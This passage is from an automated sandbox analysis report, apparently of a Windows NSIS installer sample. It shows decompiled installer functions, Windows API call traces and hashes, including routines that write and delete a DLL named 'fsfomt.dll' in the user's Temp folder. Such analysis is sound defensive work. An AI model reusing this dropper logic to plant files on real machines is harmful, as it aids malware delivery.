                                                                        0x00405b91
                                                                        0x00405b98
                                                                        0x00405b7e
                                                                        0x00405b85
                                                                        0x00405b85
                                                                        0x00405ba0
                                                                        0x00405ba3
                                                                        0x00405b6b
                                                                        0x00405b6c
                                                                        0x00405b6c
                                                                        0x00000000
                                                                        0x00405ba3
                                                                        0x00405a7e
                                                                        0x00405a82
                                                                        0x00405a87
                                                                        0x00405a88
                                                                        0x00405a8b
                                                                        0x00405a96
                                                                        0x00405a99
                                                                        0x00405a9c
                                                                        0x00405ab5
                                                                        0x00405ab8
                                                                        0x00405ae5
                                                                        0x00405ae8
                                                                        0x00405af8
                                                                        0x00405afb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405b03
                                                                        0x00000000
                                                                        0x00405b03
                                                                        0x00405af0
                                                                        0x00000000
                                                                        0x00405af0
                                                                        0x00405aca
                                                                        0x00405acf
                                                                        0x00405ad2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405ade
                                                                        0x00000000
                                                                        0x00405a9e
                                                                        0x00405aae
                                                                        0x00405b09
                                                                        0x00405b09
                                                                        0x00405b0c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405b0c
                                                                        0x00405a8d
                                                                        0x00405a8d
                                                                        0x00405b0e
                                                                        0x00405b0e
                                                                        0x00405b15
                                                                        0x00405b19
                                                                        0x00405b19
                                                                        0x00405b1a
                                                                        0x00405b1d
                                                                        0x00405b29
                                                                        0x00405b2f
                                                                        0x00405b31
                                                                        0x00405b50
                                                                        0x00405b50
                                                                        0x00000000
                                                                        0x00405b50
                                                                        0x00405b37
                                                                        0x00405b40
                                                                        0x00405b43
                                                                        0x00405b48
                                                                        0x00405b4c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405b53
                                                                        0x00405b53
                                                                        0x00405b53
                                                                        0x00405b57
                                                                        0x00405b5a
                                                                        0x00405b5c
                                                                        0x00405b60
                                                                        0x00405b66
                                                                        0x00405b66
                                                                        0x00405b60
                                                                        0x00000000
                                                                        0x00405b5a
                                                                        0x00405a8b
                                                                        0x00405be2
                                                                        0x00405bec
                                                                        0x00405bf8
                                                                        0x00405bf8
                                                                        0x00000000

                                                                        APIs
                                                                        • SHGetSpecialFolderLocation.SHELL32(00404D9A,00789938,00000006,0079ED60,00000000,00404D9A,0079ED60,00000000), ref: 00405B29
                                                                        • SHGetPathFromIDListA.SHELL32(00789938,007A1F20), ref: 00405B37
                                                                        • lstrcatA.KERNEL32(007A1F20,00000000), ref: 00405B66
                                                                        • lstrlenA.KERNEL32(007A1F20,00000006,0079ED60,00000000,00404D9A,0079ED60,00000000,00000000,0078ED38,00789938), ref: 00405BBA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: FolderFromListLocationPathSpeciallstrcatlstrlen
                                                                        • String ID: C:\Program Files$CommonFilesDir$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                        • API String ID: 4227507514-3711765563
                                                                        • Opcode ID: bb177ee3615b619df9c73ca70b65f722049f4b351553e2cdd88049d5eba40c88
                                                                        • Instruction ID: 88f6e72dca0f61d75e3a0e3e21e18f1b78018e843eea250326dc72cf64c4fd20
                                                                        • Opcode Fuzzy Hash: bb177ee3615b619df9c73ca70b65f722049f4b351553e2cdd88049d5eba40c88
                                                                        • Instruction Fuzzy Hash: 20512671904A44AAEB206B248C84B7F3B74EB52324F20823BF941B62C2D77C7941DF5E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 32%
                                                                        			E004026FA() {
                                                                        				void* _t23;
                                                                        				void* _t28;
                                                                        				long _t33;
                                                                        				struct _OVERLAPPED* _t48;
                                                                        				void* _t51;
                                                                        				void* _t53;
                                                                        				void* _t54;
                                                                        				CHAR* _t55;
                                                                        				void* _t58;
                                                                        				void* _t59;
                                                                        				void* _t60;
                                                                        
                                                                        				 *((intOrPtr*)(_t60 - 0x34)) = 0xfffffd66;
                                                                        				_t54 = E00402A9A(_t48);
                                                                        				_t23 = E00405538(_t54);
                                                                        				_push(_t54);
                                                                        				if(_t23 == 0) {
                                                                        					lstrcatA(E004054CC(E004059BF("C:\Users\jones\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll", "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
                                                                        					_t55 = 0x40a018;
                                                                        				} else {
                                                                        					_push(0x40a018);
                                                                        					E004059BF();
                                                                        				}
                                                                        				E00405BFB(_t55);
                                                                        				_t28 = E00405690(_t55, 0x40000000, 2);
                                                                        				 *(_t60 + 8) = _t28;
                                                                        				if(_t28 != 0xffffffff) {
                                                                        					_t33 =  *0x7a2f8c;
                                                                        					 *(_t60 - 0x2c) = _t33;
                                                                        					_t53 = GlobalAlloc(0x40, _t33);
                                                                        					if(_t53 != _t48) {
                                                                        						E004030FF(_t48);
                                                                        						E004030CD(_t53,  *(_t60 - 0x2c));
                                                                        						_t58 = GlobalAlloc(0x40,  *(_t60 - 0x1c));
                                                                        						 *(_t60 - 0x30) = _t58;
                                                                        						if(_t58 != _t48) {
                                                                        							_push( *(_t60 - 0x1c));
                                                                        							_push(_t58);
                                                                        							_push(_t48);
                                                                        							_push( *((intOrPtr*)(_t60 - 0x20)));
                                                                        							E00402EBD();
                                                                        							while( *_t58 != _t48) {
                                                                        								_t59 = _t58 + 8;
                                                                        								 *(_t60 - 0x38) =  *_t58;
                                                                        								E00405670( *((intOrPtr*)(_t58 + 4)) + _t53, _t59,  *_t58);
                                                                        								_t58 = _t59 +  *(_t60 - 0x38);
                                                                        							}
                                                                        							GlobalFree( *(_t60 - 0x30));
                                                                        						}
                                                                        						WriteFile( *(_t60 + 8), _t53,  *(_t60 - 0x2c), _t60 - 0x44, _t48);
                                                                        						GlobalFree(_t53);
                                                                        						_push(_t48);
                                                                        						_push(_t48);
                                                                        						_push( *(_t60 + 8));
                                                                        						_push(0xffffffff);
                                                                        						 *((intOrPtr*)(_t60 - 0x34)) = E00402EBD();
                                                                        					}
                                                                        					CloseHandle( *(_t60 + 8));
                                                                        					_t55 = 0x40a018;
                                                                        				}
                                                                        				_t51 = 0xfffffff3;
                                                                        				if( *((intOrPtr*)(_t60 - 0x34)) < _t48) {
                                                                        					_t51 = 0xffffffef;
                                                                        					DeleteFileA(_t55);
                                                                        					 *((intOrPtr*)(_t60 - 4)) = 1;
                                                                        				}
                                                                        				_push(_t51);
                                                                        				E00401428();
                                                                        				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t60 - 4));
                                                                        				return 0;
                                                                        			}














                                                                        0x004026fb
                                                                        0x00402707
                                                                        0x0040270a
                                                                        0x00402711
                                                                        0x00402712
                                                                        0x00402737
                                                                        0x0040273c
                                                                        0x00402714
                                                                        0x00402719
                                                                        0x0040271a
                                                                        0x0040271a
                                                                        0x00402742
                                                                        0x0040274f
                                                                        0x00402757
                                                                        0x0040275a
                                                                        0x00402760
                                                                        0x0040276e
                                                                        0x00402773
                                                                        0x00402777
                                                                        0x0040277a
                                                                        0x00402783
                                                                        0x0040278f
                                                                        0x00402793
                                                                        0x00402796
                                                                        0x00402798
                                                                        0x0040279b
                                                                        0x0040279c
                                                                        0x0040279d
                                                                        0x004027a0
                                                                        0x004027bf
                                                                        0x004027ac
                                                                        0x004027b4
                                                                        0x004027b7
                                                                        0x004027bc
                                                                        0x004027bc
                                                                        0x004027c6
                                                                        0x004027c6
                                                                        0x004027d8
                                                                        0x004027df
                                                                        0x004027e5
                                                                        0x004027e6
                                                                        0x004027e7
                                                                        0x004027ea
                                                                        0x004027f1
                                                                        0x004027f1
                                                                        0x004027f7
                                                                        0x004027fd
                                                                        0x004027fd
                                                                        0x00402807
                                                                        0x00402808
                                                                        0x0040280c
                                                                        0x0040280e
                                                                        0x00402814
                                                                        0x00402814
                                                                        0x0040281b
                                                                        0x004021e8
                                                                        0x00402932
                                                                        0x0040293e

                                                                        APIs
                                                                        • lstrcatA.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 00402737
                                                                        • GlobalAlloc.KERNEL32(00000040,?,C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll,40000000,00000002,C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll,00000000,00000000,C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 00402771
                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040278D
                                                                        • GlobalFree.KERNEL32 ref: 004027C6
                                                                        • WriteFile.KERNEL32(?,00000000,?,?), ref: 004027D8
                                                                        • GlobalFree.KERNEL32 ref: 004027DF
                                                                        • CloseHandle.KERNEL32(?), ref: 004027F7
                                                                        • DeleteFileA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll,C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll,40000000,00000002,C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll,00000000,00000000,C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 0040280E
                                                                          • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWritelstrcatlstrcpyn
                                                                        • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll
                                                                        • API String ID: 3508600917-2253332803
                                                                        • Opcode ID: d89732e6fba566c184c8790af0f9760d3bcc362a7ab7685eaae326e05ea9e627
                                                                        • Instruction ID: 0812298b90ecd2d5aad5402bcd4d52469fb6612ace7046921d2b432afa3f8679
                                                                        • Opcode Fuzzy Hash: d89732e6fba566c184c8790af0f9760d3bcc362a7ab7685eaae326e05ea9e627
                                                                        • Instruction Fuzzy Hash: 1631CD71C01618BBDB116FA5CE89DAF7A38EF45324B10823AF914772D1CB7C5D019BA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E00404D62(CHAR* _a4, CHAR* _a8) {
                                                                        				struct HWND__* _v8;
                                                                        				signed int _v12;
                                                                        				CHAR* _v32;
                                                                        				long _v44;
                                                                        				int _v48;
                                                                        				void* _v52;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				CHAR* _t26;
                                                                        				signed int _t27;
                                                                        				CHAR* _t28;
                                                                        				long _t29;
                                                                        				signed int _t39;
                                                                        
                                                                        				_t26 =  *0x7a2764;
                                                                        				_v8 = _t26;
                                                                        				if(_t26 != 0) {
                                                                        					_t27 =  *0x4092a0; // 0x6
                                                                        					_v12 = _t27;
                                                                        					_t39 = _t27 & 0x00000001;
                                                                        					if(_t39 == 0) {
                                                                        						E004059E1(0, _t39, 0x79ed60, 0x79ed60, _a4);
                                                                        					}
                                                                        					_t26 = lstrlenA(0x79ed60);
                                                                        					_a4 = _t26;
                                                                        					if(_a8 == 0) {
                                                                        						L6:
                                                                        						if((_v12 & 0x00000004) != 0) {
                                                                        							_t26 = SetWindowTextA( *0x7a2748, 0x79ed60);
                                                                        						}
                                                                        						if((_v12 & 0x00000002) != 0) {
                                                                        							_v32 = 0x79ed60;
                                                                        							_v52 = 1;
                                                                        							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                                                                        							_v44 = 0;
                                                                        							_v48 = _t29 - _t39;
                                                                        							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                                                                        							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                                                                        						}
                                                                        						if(_t39 != 0) {
                                                                        							_t28 = _a4;
                                                                        							 *((char*)(_t28 + 0x79ed60)) = 0;
                                                                        							return _t28;
                                                                        						}
                                                                        					} else {
                                                                        						_t26 =  &(_a4[lstrlenA(_a8)]);
                                                                        						if(_t26 < 0x800) {
                                                                        							_t26 = lstrcatA(0x79ed60, _a8);
                                                                        							goto L6;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return _t26;
                                                                        			}

















                                                                        0x00404d68
                                                                        0x00404d74
                                                                        0x00404d77
                                                                        0x00404d7d
                                                                        0x00404d89
                                                                        0x00404d8c
                                                                        0x00404d8f
                                                                        0x00404d95
                                                                        0x00404d95
                                                                        0x00404d9b
                                                                        0x00404da3
                                                                        0x00404da6
                                                                        0x00404dc3
                                                                        0x00404dc7
                                                                        0x00404dd0
                                                                        0x00404dd0
                                                                        0x00404dda
                                                                        0x00404de3
                                                                        0x00404def
                                                                        0x00404df6
                                                                        0x00404dfa
                                                                        0x00404dfd
                                                                        0x00404e10
                                                                        0x00404e1e
                                                                        0x00404e1e
                                                                        0x00404e22
                                                                        0x00404e24
                                                                        0x00404e27
                                                                        0x00000000
                                                                        0x00404e27
                                                                        0x00404da8
                                                                        0x00404db0
                                                                        0x00404db8
                                                                        0x00404dbe
                                                                        0x00000000
                                                                        0x00404dbe
                                                                        0x00404db8
                                                                        0x00404da6
                                                                        0x00404e31

                                                                        APIs
                                                                        • lstrlenA.KERNEL32(0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                                                        • lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                                                        • lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078ED38,00789938), ref: 00404DBE
                                                                        • SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                                                        • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                                                        • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                        • String ID: `y
                                                                        • API String ID: 2531174081-1740403070
                                                                        • Opcode ID: edad6dc2de89f9ed618421ce26d5d36bc75d71d20e9e6f22415f143a986efb4b
                                                                        • Instruction ID: cb3b45f852b3c740c34d3f7777c40130103cf21f354e3c75b2961a2ef6a5418a
                                                                        • Opcode Fuzzy Hash: edad6dc2de89f9ed618421ce26d5d36bc75d71d20e9e6f22415f143a986efb4b
                                                                        • Instruction Fuzzy Hash: 5C2160B1900118BBDB119F99DD85DDEBFA9FF45354F14807AFA04B6291C7398E40CBA8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00405BFB(CHAR* _a4) {
                                                                        				char _t5;
                                                                        				char _t7;
                                                                        				char* _t15;
                                                                        				char* _t16;
                                                                        				CHAR* _t17;
                                                                        
                                                                        				_t17 = _a4;
                                                                        				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                                                        					_t17 =  &(_t17[4]);
                                                                        				}
                                                                        				if( *_t17 != 0 && E00405538(_t17) != 0) {
                                                                        					_t17 =  &(_t17[2]);
                                                                        				}
                                                                        				_t5 =  *_t17;
                                                                        				_t15 = _t17;
                                                                        				_t16 = _t17;
                                                                        				if(_t5 != 0) {
                                                                        					do {
                                                                        						if(_t5 > 0x1f &&  *((char*)(E004054F7("*?|<>/\":", _t5))) == 0) {
                                                                        							E00405670(_t16, _t17, CharNextA(_t17) - _t17);
                                                                        							_t16 = CharNextA(_t16);
                                                                        						}
                                                                        						_t17 = CharNextA(_t17);
                                                                        						_t5 =  *_t17;
                                                                        					} while (_t5 != 0);
                                                                        				}
                                                                        				 *_t16 =  *_t16 & 0x00000000;
                                                                        				while(1) {
                                                                        					_t16 = CharPrevA(_t15, _t16);
                                                                        					_t7 =  *_t16;
                                                                        					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                        						break;
                                                                        					}
                                                                        					 *_t16 =  *_t16 & 0x00000000;
                                                                        					if(_t15 < _t16) {
                                                                        						continue;
                                                                        					}
                                                                        					break;
                                                                        				}
                                                                        				return _t7;
                                                                        			}








                                                                        0x00405bfd
                                                                        0x00405c05
                                                                        0x00405c19
                                                                        0x00405c19
                                                                        0x00405c1f
                                                                        0x00405c2c
                                                                        0x00405c2c
                                                                        0x00405c2d
                                                                        0x00405c2f
                                                                        0x00405c33
                                                                        0x00405c35
                                                                        0x00405c3e
                                                                        0x00405c40
                                                                        0x00405c5a
                                                                        0x00405c62
                                                                        0x00405c62
                                                                        0x00405c67
                                                                        0x00405c69
                                                                        0x00405c6b
                                                                        0x00405c6f
                                                                        0x00405c70
                                                                        0x00405c73
                                                                        0x00405c7b
                                                                        0x00405c7d
                                                                        0x00405c81
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405c87
                                                                        0x00405c8c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405c8c
                                                                        0x00405c91

                                                                        APIs
                                                                        • CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
                                                                        • CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
                                                                        • CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
                                                                        • CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75
                                                                        Strings
                                                                        • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00405C37
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BFB, 00405BFC
                                                                        • *?|<>/":, xrefs: 00405C43
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Char$Next$Prev
                                                                        • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
                                                                        • API String ID: 589700163-562438032
                                                                        • Opcode ID: c3e6b7e6cb13a4bbd62a9e478f04b3777cedf0421140d3393f81b5e1ccfcad21
                                                                        • Instruction ID: 741f4f1766c378bb4ac774d7bbda26dd0b1b0e4f9567a31439ebc024b01f0e93
                                                                        • Opcode Fuzzy Hash: c3e6b7e6cb13a4bbd62a9e478f04b3777cedf0421140d3393f81b5e1ccfcad21
                                                                        • Instruction Fuzzy Hash: 7B11D05180CB9429FB3216284D44BBB7B98CB9B760F18047BE9C4722C2D67C5C828B6D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00403E0E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                        				struct tagLOGBRUSH _v16;
                                                                        				long _t35;
                                                                        				long _t37;
                                                                        				void* _t40;
                                                                        				long* _t49;
                                                                        
                                                                        				if(_a4 + 0xfffffecd > 5) {
                                                                        					L15:
                                                                        					return 0;
                                                                        				}
                                                                        				_t49 = GetWindowLongA(_a12, 0xffffffeb);
                                                                        				if(_t49 == 0) {
                                                                        					goto L15;
                                                                        				}
                                                                        				_t35 =  *_t49;
                                                                        				if((_t49[5] & 0x00000002) != 0) {
                                                                        					_t35 = GetSysColor(_t35);
                                                                        				}
                                                                        				if((_t49[5] & 0x00000001) != 0) {
                                                                        					SetTextColor(_a8, _t35);
                                                                        				}
                                                                        				SetBkMode(_a8, _t49[4]);
                                                                        				_t37 = _t49[1];
                                                                        				_v16.lbColor = _t37;
                                                                        				if((_t49[5] & 0x00000008) != 0) {
                                                                        					_t37 = GetSysColor(_t37);
                                                                        					_v16.lbColor = _t37;
                                                                        				}
                                                                        				if((_t49[5] & 0x00000004) != 0) {
                                                                        					SetBkColor(_a8, _t37);
                                                                        				}
                                                                        				if((_t49[5] & 0x00000010) != 0) {
                                                                        					_v16.lbStyle = _t49[2];
                                                                        					_t40 = _t49[3];
                                                                        					if(_t40 != 0) {
                                                                        						DeleteObject(_t40);
                                                                        					}
                                                                        					_t49[3] = CreateBrushIndirect( &_v16);
                                                                        				}
                                                                        				return _t49[3];
                                                                        			}








                                                                        0x00403e20
                                                                        0x00403eb4
                                                                        0x00000000
                                                                        0x00403eb4
                                                                        0x00403e31
                                                                        0x00403e35
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403e3b
                                                                        0x00403e44
                                                                        0x00403e47
                                                                        0x00403e47
                                                                        0x00403e4d
                                                                        0x00403e53
                                                                        0x00403e53
                                                                        0x00403e5f
                                                                        0x00403e65
                                                                        0x00403e6c
                                                                        0x00403e6f
                                                                        0x00403e72
                                                                        0x00403e74
                                                                        0x00403e74
                                                                        0x00403e7c
                                                                        0x00403e82
                                                                        0x00403e82
                                                                        0x00403e8c
                                                                        0x00403e91
                                                                        0x00403e94
                                                                        0x00403e99
                                                                        0x00403e9c
                                                                        0x00403e9c
                                                                        0x00403eac
                                                                        0x00403eac
                                                                        0x00000000

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                        • String ID:
                                                                        • API String ID: 2320649405-0
                                                                        • Opcode ID: c97ffb24e4734704427e7b606a740b4fab5c3533c49fee8400ef737fc9d4ca7c
                                                                        • Instruction ID: 944c776da9ffcbc306ecb8e42b0009ed864c9b653f4a8b06b4458955b6ce273b
                                                                        • Opcode Fuzzy Hash: c97ffb24e4734704427e7b606a740b4fab5c3533c49fee8400ef737fc9d4ca7c
                                                                        • Instruction Fuzzy Hash: 25214F71904744ABCB219F68DD08B5BBFF8AF00715B048A69F895E22E1D738EA04CB95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 78%
                                                                        			E0040166B() {
                                                                        				int _t18;
                                                                        				void* _t28;
                                                                        				void* _t35;
                                                                        
                                                                        				 *(_t35 + 8) = E00402A9A(0xffffffd0);
                                                                        				 *(_t35 - 8) = E00402A9A(0xffffffdf);
                                                                        				E004059BF(0x40a018,  *(_t35 + 8));
                                                                        				_t18 = lstrlenA( *(_t35 - 8));
                                                                        				if(_t18 + lstrlenA( *(_t35 + 8)) < 0x3fd) {
                                                                        					lstrcatA(0x40a018, 0x40901c);
                                                                        					lstrcatA(0x40a018,  *(_t35 - 8));
                                                                        				}
                                                                        				if(MoveFileA( *(_t35 + 8),  *(_t35 - 8)) == 0) {
                                                                        					if( *((intOrPtr*)(_t35 - 0x1c)) == _t28 || E00405C94( *(_t35 + 8)) == 0) {
                                                                        						 *((intOrPtr*)(_t35 - 4)) = 1;
                                                                        					} else {
                                                                        						E00405707( *(_t35 + 8),  *(_t35 - 8));
                                                                        						_push(0xffffffe4);
                                                                        						goto L7;
                                                                        					}
                                                                        				} else {
                                                                        					_push(0xffffffe3);
                                                                        					L7:
                                                                        					E00401428();
                                                                        				}
                                                                        				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t35 - 4));
                                                                        				return 0;
                                                                        			}






                                                                        0x00401674
                                                                        0x00401684
                                                                        0x00401688
                                                                        0x00401690
                                                                        0x004016a7
                                                                        0x004016af
                                                                        0x004016b8
                                                                        0x004016b8
                                                                        0x004016cb
                                                                        0x004016d7
                                                                        0x004026da
                                                                        0x004016ed
                                                                        0x004016f3
                                                                        0x004016f8
                                                                        0x00000000
                                                                        0x004016f8
                                                                        0x004016cd
                                                                        0x004016cd
                                                                        0x004021e8
                                                                        0x004021e8
                                                                        0x004021e8
                                                                        0x00402932
                                                                        0x0040293e

                                                                        APIs
                                                                          • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
                                                                        • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll,?,000000DF,000000D0), ref: 00401690
